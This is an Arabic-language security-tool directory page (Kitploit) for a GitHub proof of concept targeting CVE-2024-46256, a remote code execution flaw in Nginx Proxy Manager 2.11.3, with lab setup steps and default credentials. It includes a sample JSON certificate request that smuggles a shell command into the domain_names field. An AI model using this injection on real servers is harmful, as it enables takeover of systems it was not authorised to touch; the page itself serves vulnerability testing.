Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46256 — أداة CVE-2024-46256 | Kitploit
أدوات/GitHubGitHub/kimtangker/cve-2024-46256
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

أداة CVE-2024-46256

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تحليل ثغرة CVE-2024-46256 في Nginx Proxy Manager RCE

إعداد البيئة

1. تشغيل بيئة Nginx Proxy Manager 2.11.3

root@kitploit:~

docker-compose up -d

أو يمكنك استخدام السكريبت التلقائي:

root@kitploit:~

python setup_environment.py

2. الوصول إلى Nginx Proxy Manager

  • URL: http://localhost:81
  • بعد إكمال الإعدادات الأولية، تابع الاختبار.
  • تسجيل الدخول باستخدام حساب المدير الافتراضي (البريد الإلكتروني: [email protected] / كلمة المرور: changeme)
  • التحقق من صلاحية الوصول إلى وظائف إصدار الشهادات.

معلومات الثغرة

  • CVE ID: CVE-2024-46256
  • المنتج: Nginx Proxy Manager
  • الإصدار: 2.11.3
  • نوع الثغرة: Remote Code Execution (RCE)
  • CVSS: عالي

كود PoC

يستغل PoC مستخدمًا موثوقًا يقوم بإدخال قوالب/أوامر في حقل اسم النطاق أثناء طلب إصدار شهادة (مثل Let's Encrypt)، مما يؤدي إلى تنفيذ تعليمات برمجية عن بعد (RCE).

مثال على الحمولة (مثال توضيحي):

root@kitploit:~
{
  "domain_names": ["test.com\"||{command}||\\n test.com\""],
  "meta": {
    "dns_challenge": false,
    "letsencrypt_agree": true,
    "letsencrypt_email": "[email protected]"
  },
  "provider": "letsencrypt"
}

بيئة التحليل

  • نظام التشغيل: Windows 10
  • Docker: أحدث إصدار
  • Nginx Proxy Manager: 2.11.3
تنزيل الأداة